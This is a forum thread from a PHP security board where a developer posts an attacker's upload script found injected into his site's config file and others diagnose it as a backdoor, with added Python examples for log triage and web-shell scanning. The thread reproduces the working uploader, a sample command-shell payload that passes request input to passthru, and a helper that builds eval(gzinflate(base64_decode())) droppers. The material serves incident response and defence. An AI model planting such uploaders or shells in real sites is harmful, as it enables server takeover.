My website hacked.

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

donald.tbd
Forum Newbie
Posts: 2
Joined: Thu Oct 13, 2011 4:43 am

My website hacked.

Post by donald.tbd »

Hello,

I have been a web developer for about 10 years. I was asked by a friend to make a site for him because his previous site was hacked and messed up. Now, I think I keep my security pretty tight and was positive something like that wouldn't happen to my site. The dumb thing that I did was keep the old site on the server (my friend asked me to, because there were some pictures there that she wanted later). I just moved it to a whole new directory and renamed it to old_site or something.

Now one day I find out that something is wrong. First, there is an upload script written into one of my main config files, and second, someone has already uploaded something.
My main questions are:
1) I'm pretty sure the attack came somehow through the old_site that I kept (now deleted), but even so, how is it possible to directly edit my config file?
2) I was able to remove the upload script and the uploaded file, but I don't know what the uploaded file did. I'm going to post the uploaded script; can anyone guess what its purpose was?

The upload script in my config file:

<?php
// Injected uploader (attacker's code, left as posted): prints the OS/kernel
// banner, then renders a file-upload form that posts back to this same page.
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    // Copies the uploaded temp file into the current working directory under
    // the client-supplied name, with no type, extension or path check; the
    // '@' suppresses any warning. Both branches print the same tag, so the
    // page never reveals whether the write succeeded.
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; }
    else { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; }
}
?>

The uploaded file: http://justpaste.it/jbw (a lot of code, so I copied it elsewhere)

Would be thankful for any help :)
social_experiment
DevNet Master
Posts: 2793
Joined: Sun Feb 15, 2009 11:08 am
Location: .za

Re: My website hacked.

Post by social_experiment »

The script copies a file; copy() overwrites the destination file if it exists so the attacker could have overwritten a system file with their own copy.
“Don’t worry if it doesn’t work right. If everything did, you’d be out of a job.” - Mosher’s Law of Software Engineering
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: My website hacked.

Post by Mordred »

social_experiment wrote:The script copies a file; copy() overwrites the destination file if it exists so the attacker could have overwritten a system file with their own copy.
Only if it was writable by the user that runs apache/php, so - probably not.

The uploaded file is a backdoor/shell script.

Have you looked through your access and error logs?
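Mordred's question about the logs is the right place to start. Here is an added example, not code from any poster in this thread, of what that first pass over an Apache/nginx combined-format access log can look like in Python. The log excerpt is constructed to mirror the situation described above; the paths (old_site/, includes/config.php, includes/ad.php), the set of pages that legitimately accept POST and the list of deployed files are all assumptions made for the example and would come from the real deployment in practice.

```python
"""Access-log triage after a suspected web-shell upload (added example, not a
poster's code). Log lines, paths and site assumptions are constructed."""
import re
from collections import defaultdict

# Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: a normal visitor, then a client who probes the abandoned
# old_site/ copy, POSTs to a config file that never takes form input, and then
# fetches a file the developer never deployed.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Oct/2011:09:01:12 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Oct/2011:09:01:15 +0000] "POST /contact.php HTTP/1.1" 200 812 "http://example.test/contact.php" "Mozilla/5.0"
203.0.113.42 - - [13/Oct/2011:10:22:01 +0000] "GET /old_site/admin/upload.php HTTP/1.1" 200 2210 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.42 - - [13/Oct/2011:10:22:40 +0000] "POST /old_site/admin/upload.php HTTP/1.1" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.42 - - [13/Oct/2011:10:23:05 +0000] "GET /includes/config.php HTTP/1.1" 200 640 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.42 - - [13/Oct/2011:10:23:19 +0000] "POST /includes/config.php HTTP/1.1" 200 702 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.42 - - [13/Oct/2011:10:23:33 +0000] "GET /includes/ad.php HTTP/1.1" 200 9875 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
"""

# Assumed site facts: which pages accept POST and which files were deployed.
# In a real triage, derive these from version control or the deploy manifest.
EXPECTED_POST_PATHS = {"/contact.php", "/login.php"}
DEPLOYED_FILES = {"/index.php", "/contact.php", "/login.php", "/includes/config.php"}
RETIRED_PREFIXES = ("/old_site/",)


def parse(log_text):
    """Yield one dict per parseable combined-format line."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            d = m.groupdict()
            d["status"] = int(d["status"])
            yield d


def triage(log_text):
    """Return findings keyed by client IP, each a list of (reason, path) tuples."""
    findings = defaultdict(list)
    for r in parse(log_text):
        path = r["path"].split("?", 1)[0]
        ip, method, status = r["ip"], r["method"], r["status"]
        if path.startswith(RETIRED_PREFIXES):
            findings[ip].append(("request to retired code", path))
        if method == "POST" and path not in EXPECTED_POST_PATHS:
            findings[ip].append(("POST to a page that never takes POSTs", path))
        if status == 200 and path not in DEPLOYED_FILES and not path.startswith(RETIRED_PREFIXES):
            findings[ip].append(("200 for a file not in the deployed tree", path))
    return dict(findings)


def suspects(log_text):
    """IPs that both touched retired code and POSTed to a non-form page."""
    out = []
    for ip, hits in triage(log_text).items():
        reasons = {reason for reason, _ in hits}
        if {"request to retired code", "POST to a page that never takes POSTs"} <= reasons:
            out.append(ip)
    return sorted(out)


if __name__ == "__main__":
    for ip, hits in triage(SAMPLE_LOG).items():
        for reason, path in hits:
            print(f"{ip:15} {reason:42} {path}")
    print("suspects:", suspects(SAMPLE_LOG))
```

The three checks are deliberately simple: a hit on the retired directory, a POST to something that is not a form, and a successful response for a file that was never deployed. The client that trips all three in sequence is the one whose whole session is worth reading line by line, together with the error log for the same window.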
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: My website hacked.

Post by Eric! »

I agree. The most common thing is a back door shell script installed somewhere, like c99 or r57. These tools are surprisingly efficient at compromising your server. Here's a tutorial on some of the things to look for in the log files.

http://25yearsofprogramming.com/blog/2010/20100315.htm

Yours looks like plain text, but a lot of these nasties start in an encrypted form of some sort and look like:


<? eval(gzinflate(base64_decode('FJ3HjuvKkkV/pWd9AQ7oHfDwLuiN6K3ISYOe ov.......on and on'))); ?>
By the way, you should hire Mordred to audit your system. There could easily be a hole in your new code that allows this upload. I always like to blame the other guy's code, but you don't want egg on your face if it happens again.
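The injected uploader in the first post and the eval(gzinflate(base64_decode('...'))) shape Eric! describes are the two things to hunt for across the rest of the tree. The following Python is an added example, not code from this thread or from any of the tools mentioned: it flags upload-handler signatures and peels the decoder wrapper to expose the real payload. The sample file contents, the shell payload and the signature list are constructed for the example and are not exhaustive; gzinflate() is modelled as raw DEFLATE and gzuncompress() as zlib-framed DEFLATE, which is what those PHP functions consume.

```python
"""Hunt for the two web-shell shapes seen in this thread (added example, not
a poster's code): an injected $_FILES uploader and an eval(gzinflate(
base64_decode('...'))) wrapper. Sample files, payload and the signature list
are constructed here and are not exhaustive."""
import base64
import codecs
import re
import zlib

# Indicators of an injected upload handler like the one in the config file.
UPLOADER_SIGNATURES = [
    (r"\$_FILES\s*\[", "reads $_FILES"),
    (r"\b(?:copy|move_uploaded_file)\s*\(\s*\$_FILES", "writes an uploaded file"),
    (r"\bphp_uname\s*\(", "prints php_uname() as a banner"),
]

# eval( decoder( decoder( ... ('<blob>') ) ) ); with any mix of these decoders.
WRAPPER_RE = re.compile(
    r"eval\s*\(\s*((?:(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(\s*)+)"
    r"['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)+\s*;",
    re.S,
)

# PHP decoders modelled in Python: gzinflate() is raw DEFLATE (no zlib header),
# gzuncompress() is zlib-framed DEFLATE.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
}


def unwrap(php_src, max_depth=10):
    """Peel eval(decoder(...('blob'))) layers; return (payload, layers_peeled)."""
    src, depth = php_src, 0
    while depth < max_depth:
        m = WRAPPER_RE.search(src)
        if not m:
            break
        chain = re.findall(r"[a-z_0-9]+", m.group(1))   # outermost decoder first
        data = re.sub(r"\s+", "", m.group(2)).encode()
        for fn in reversed(chain):                      # innermost runs first
            data = DECODERS[fn](data)
        src = data.decode("utf-8", errors="replace")
        depth += 1
    return src, depth


def wrap(payload, layers=2):
    """Build a dropper-style file for testing: nest eval(gzinflate(base64_decode()))."""
    src = payload
    for _ in range(layers):
        co = zlib.compressobj(wbits=-15)
        blob = base64.b64encode(co.compress(src.encode()) + co.flush()).decode()
        src = f"eval(gzinflate(base64_decode('{blob}')));"
    return "<?php " + src + " ?>"


def scan(files):
    """Return (path, finding) pairs for a {path: php_source} mapping."""
    findings = []
    for path, src in files.items():
        for pattern, label in UPLOADER_SIGNATURES:
            if re.search(pattern, src):
                findings.append((path, label))
        payload, depth = unwrap(src)
        if depth:
            findings.append((path, f"eval() wrapper, {depth} layer(s), payload: {payload[:40]!r}"))
    return findings


# Constructed sample tree: a clean page, the injected uploader (abridged from
# the first post), and a hidden file carrying a wrapped command shell.
SHELL_PAYLOAD = "if (isset($_REQUEST['cmd'])) { passthru($_REQUEST['cmd']); }"
SAMPLE_FILES = {
    "index.php": '<?php echo "hello"; ?>',
    "includes/config.php": r"""<?php
echo '<b>'.php_uname().'</b>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'done'; }
}
?>""",
    "images/.cache.php": wrap(SHELL_PAYLOAD, layers=2),
}

if __name__ == "__main__":
    for path, finding in scan(SAMPLE_FILES):
        print(f"{path:22} {finding}")
```

Run it against a copy of the webroot (build the mapping with os.walk over *.php, including dot-files and image directories, which is where droppers like to hide). Peeling the layers in Python rather than running the file through PHP matters: the payload is inspected without ever being executed.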
donald.tbd
Forum Newbie
Posts: 2
Joined: Thu Oct 13, 2011 4:43 am

Re: My website hacked.

Post by donald.tbd »

Eric! wrote:I agree. The most common thing is a back door shell script installed somewhere, like c99 or r57. These tools are surprisingly efficient at compromising your server. Here's a tutorial on some of the things to look for in the log files.

http://25yearsofprogramming.com/blog/2010/20100315.htm

Yours looks like plain text, but a lot of these nasties start in an encrypted form of some sort and look like:

<? eval(gzinflate(base64_decode('FJ3HjuvKkkV/pWd9AQ7oHfDwLuiN6K3ISYOe ov.......on and on'))); ?>
By the way, you should hire Mordred to audit your system. There could easily be a hole in your new code that allows this upload. I always like to blame the other guy's code, but you don't want egg on your face if it happens again.

How much does this audit cost :) ?
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: My website hacked.

Post by Mordred »

@Donald, I have a standing offer for 3 free hours of whitebox audit, check this: viewtopic.php?f=17&t=129090

@Eric!: Thanks for the promotion man ;)
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: My website hacked.

Post by Eric! »

You should start a website with your services and feedback from your free audits, including some sample results, your fees, etc. (Also so we can all sit around and try to hack it. :) )
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: My website hacked.

Post by Mordred »

Haha. No :)
Most of the issues are boooring. "Didn't escape", "Didn't check the extension" ... boooring. I've seen some cool ones though, have to dig them up.

---
Ha, found one, it was a fun game: viewtopic.php?f=34&t=76929
I remember the Skeleton project having a funny homebrew escaping solution that I exploited, but I can't find my post about it :/
JimJiang
Forum Newbie
Posts: 5
Joined: Wed Nov 09, 2011 7:32 am

Re: My website hacked.

Post by JimJiang »

Did someone upload a PHP script?
For example:
I can upload a PHP file with your script.
The PHP code is:
ad.php:
<?php
phpinfo();
?>
Then I can run this script in order to get information about your server.
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: My website hacked.

Post by Eric! »

@mordred eval() is definitely full of fun exploits. I was thinking more along the lines of you distilling the examples into something more security focused and using them to illustrate how many programmers never even realize how many holes they open up. You could use this as part of an on-line portfolio to help demonstrate your skills and how often confident programmers unknowingly open up a can of worms...yada yada. So why the haha no?